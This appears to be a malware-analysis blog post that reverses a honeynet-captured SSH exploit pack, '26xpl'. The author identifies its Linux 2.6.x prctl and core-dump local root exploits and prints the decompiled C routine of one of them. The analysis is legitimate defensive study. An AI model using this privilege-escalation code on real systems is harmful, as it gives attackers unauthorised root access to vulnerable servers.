Malware - 26xpl SSH Propagating Exploit Pack

The following application comes out from the latest honeynet capture and represents
a part of a remote exploit pack, used successively to compromise other servers
and build a botnet with spam capabilities.

The provided pack presents three files:

1. a.sh (bash script containig an exploit)
2. c (ELF containing an exploit)
3. core (Obfuscated ELF containing another exploit)

a.sh is the PRCTL local root exploit, and old exploit for 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp systems, this is a support application cause other infecting binaries does not provide a local privilege escalation root exploit.

I think is important to say that this exploit is really used and abused and present in a large
ammount of Exploit Toolkit, especially in automated system for bank phishing like SmssmtpSender, this toolkit lead to compromise, manage and control a set of systems for sending SMS spam via compromised popaccounts that had weak passwords.

Let's reverse now c executable:

after disassmbling this elf with IDA we can see fastly from graph analysis that the application requires some command-line argument and finally if parameters are correct launches an exploit, as emerged from string analysis. Now is only matter of understanding what kind of exploit is executed, with a bit of string research we can isolate the following:

file db '/proc/self/environ'

usage: binary

so function attempts to attack '/proc/self/environ' by using a big filename..these are
operations performed by exploit()

printf("\ntrying to exploit %s\n\n", file);
fflush(stdout);
chmod("/proc/self/environ", 0x9EDu);
c = mmap(0, 0x1000u, 3, 33, 0, 0);
memset(c, 0, 0x1000u);
v1 = open(file, 0);
fildes = v1;
fstat(v1, &stat_buf);
v2 = mmap(0, stat_buf.st_size, 3, 2, fildes, 0);
addr = v2;
if ( v2 == (void *)-1 )
error("mmap");
prctl(4, 0, 0, 0, 0);
v3 = getpid();
sprintf(t, "/proc/%d/environ", v3);
sched_yield();
execve(0, &a, &e);
madvise(0, 0, 3);
v4 = fork();
pid = v4;
if ( v4 )
{
++*(_DWORD *)c;
v5 = madvise(addr, stat_buf.st_size, 3) == 0;
v10 = v5;
if ( v5 )
{
prctl(4, 1, 0, 0, 0);
sched_yield();
waitpid(pid, 0, 0);
exit(0);
}
error("madvise");
}
nice(10);
while ( !*(_DWORD *)c )
;
sched_yield();
execve(t, &a, &e);
error("failed");
}

here the full sourcecode of the exploit http://www.securiteam.com/exploits/5MP0E1PJ5A.html


Finally, core ELF is an obfuscated one, but from a fast string analysis emerged the following string:

aCreatingCronEn db '[*] Creating Cron entry',0Ah
db ' Core Dump Handling - Local r00t',0Ah,0

with a bit of google search emerged again the Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t

as you can see the pack presents only these three exploits vectored in an SSH infection, by inspectiong on the pack name 26xpl that could derive from backdoor shogai kit.

See you to the next post.. :)

Giuseppe 'Evilcry' Bonfa'